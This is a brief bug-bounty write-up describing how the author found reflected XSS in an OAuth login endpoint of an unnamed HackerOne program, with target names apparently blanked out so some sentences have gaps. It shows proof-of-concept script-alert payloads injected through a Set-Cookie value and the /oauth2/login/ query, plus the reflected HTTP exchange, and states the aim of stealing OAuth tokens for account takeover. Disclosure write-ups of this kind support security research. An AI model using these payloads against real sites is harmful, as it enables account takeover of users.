Hi all, My name is Naveen J AKA thevillagehacker and this is my very first write-up and I thought I should contribute some resources to the community.


I always wanted to be a very good hunter so I decided to start with low-hanging fruits and I chose to find some XSS on any of the Public Program on HackerOne.

I intercepted the login request from and sent it to the repeater and observed the way the Oauth works. The uses as an Oauth service when you click login it will redirect you to and will let you log in if you have a legitimate account. So I decided to check for Reflected XSS or any Open redirect issues to grab the Oauth token to take Over the user's account.

&Set-Cookie: <script>alert(“Hacked By Deathstroke”)</script> <script>alert("Hacked By Deathstroke")</script>


GET /oauth2/login/? <script>alert("Hacked By Deathstroke")</script> HTTP/1.1 Host: 
<script>alert("Hacked By Deathstroke")</script> HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 
